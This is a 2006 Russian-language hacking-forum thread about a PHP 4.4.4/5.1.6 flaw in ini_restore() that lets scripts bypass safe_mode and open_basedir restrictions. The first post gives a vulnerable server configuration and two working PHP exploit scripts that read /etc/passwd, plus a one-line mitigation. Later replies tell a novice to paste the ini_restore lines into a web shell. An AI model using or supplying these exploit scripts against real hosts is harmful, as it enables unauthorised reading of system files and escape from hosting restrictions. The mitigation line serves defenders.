Уязвимость php 5.1.6 и 4.4.4

Discussion in 'Уязвимости' started by corsp_puttrider, 21 Oct 2006.

Thread Status:
Not open for further replies.
  1. corsp_puttrider

    corsp_puttrider New Member

    Joined:
    16 Oct 2006
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    надеюсь это уже все знают:

    PHP 4.4.4 и более ранние версии
    PHP 5.1.6 и более ранние версии

    Уязвимость позволяет получить доступ к важным данным на системе. Уязвимость существует из-за недостаточного ограничения на смену параметров safe_mode и open_basedir в функции ini_restore(). Если эти ограничения установлены в настройках сервера, а в файле php.ini находятся значения по умолчанию, можно восстановить значения по умолчанию и обойти ограничения, установленный в конфигурационном файле сервера.

    Пример уязвимой конфигурации:

    <Directory /usr/home/frajer/public_html/>
    Options FollowSymLinks MultiViews Indexes
    AllowOverride None
    php_admin_flag safe_mode 1
    php_admin_value open_basedir /usr/home/frajer/public_html/
    </Directory>

    Эксплоит

    <?
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include("/etc/passwd");
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include("/etc/passwd");
    ?>


    PS:
    Вместо инклуд в эксплойте можно использовать fopen:
    <?
    echo("<pre>");
    ini_restore("open_basedir");
    $filename="/etc/passwd";
    $h=fopen($filename, "r");
    $contents=fread($h, filesize($filename));
    echo($contents);
    echo("OK");
    ?>
    вот так

    дырку можно закрыть так
    disable_functions = symlink,ini_restore

    Основная информация о дырке и эксплойте сдесь:
    ht_tp://securityreason.com/achievement_securityalert/42
     
    #1 corsp_puttrider, 21 Oct 2006
    Last edited: 21 Oct 2006
  2. Lancellot

    Lancellot Member

    Joined:
    9 Aug 2006
    Messages:
    138
    Likes Received:
    23
    Reputations:
    7
    Ты роскажи как пользоватся етим сплоитом яв етом деле новый! Как запускать?
     
  3. corsp_puttrider

    corsp_puttrider New Member

    Joined:
    16 Oct 2006
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Ну блин

    Почитай про Php инъекции, все сразу поймешь!!!
     
  4. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    хм, новость месечной давности. А юзать можно так. В РСТ шелле (или любом другом) сверху пишешь эти две строчки с ини_ресторе. И все.
     
    1 person likes this.
Thread Status:
Not open for further replies.